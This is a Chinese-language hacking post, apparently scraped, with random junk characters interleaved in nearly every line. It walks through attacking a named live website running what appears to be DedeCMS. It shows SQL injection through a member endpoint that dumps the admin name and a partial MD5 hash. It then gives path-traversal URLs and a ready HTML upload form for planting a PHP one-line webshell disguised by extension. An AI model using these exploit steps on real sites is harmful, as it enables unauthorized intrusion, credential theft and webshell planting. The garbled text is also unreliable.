①注入漏洞。- I- Q( `# x8 [$ }- f$ |- c! b8 K
这站 http://www.political-security.com/: K) [' @* d5 p2 N9 }2 G, @7 R
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
1 M; U) f/ j2 c e- y, A* ^) Uwww.political-security.com/data/mysql_error_trace.inc 爆后台
" \1 t3 u! i2 \然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
9 A2 f5 T) _4 X& A然后写上语句
8 D; D+ Z# `, O( I- `. Q- X' {查看管理员帐号
8 l& H( \* k7 S5 Y3 i4 k& d& uhttp://www.political-security.co ... &membergroup=@`
8 g. h$ m2 Y% e( c, P6 h, F
# y; U7 {% F8 x ]* Vadmin
3 r1 K9 q1 \, o7 _; s; }* `1 i: ~8 g0 |" K/ M# P, l9 c$ p
查看管理员密码" r- A, T1 ` b; F
http://www.political-security.co ... &membergroup=@`
( }5 `2 m/ |& _1 p
* D$ v H; ^3 P( X+ N- r7 D8d29b1ef9f8c5a5af429) S8 z) ~- o& N5 a- |6 Y
# C9 y, C- a% b6 F查看管理员密码( P- B6 A; f; n: N0 O
, @4 }6 R# j+ u8 x f" U; j( `
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD51 w# z$ l8 ]% s# a# d5 ]
) M6 ^- a) P4 _# l( x4 Z+ p8d24 {3 B- {5 u5 H, V
9b1ef9f8c5a5af42 X h$ D. |& s% ]! n
9
2 K6 |' P, W! u) `. f. ]% [: m& `$ v& H$ J1 O
cmd5没解出来 只好测试第二个方法
) Y& Z- O4 N! M0 }# p, p* j. _0 H. i7 Y2 I, W A4 d f0 N7 D1 j7 N# \
0 W9 L/ J% B' ~" Z9 X
②上传漏洞:
1 n6 j( }9 ]" `7 e) k# P: Y! a* ]! h, a. f9 m3 E/ G1 {
只要登陆会员中心,然后访问页面链接/ r x( ]& o5 E$ O6 D% i+ ]7 I
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
- O2 E. b( k3 s2 @1 d% }0 q2 v0 O* r4 g5 E
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
& k3 |: t: N6 F, x& Y _. p s E$ `2 C
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
7 w1 C% M8 H6 a6 f7 {3 d9 n) `
! L- V: f( q3 n# P<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>8 X5 R- e1 L" v0 i8 D
或者
$ S# _( a& u4 Y: L+ [7 o: j即可上传成功 |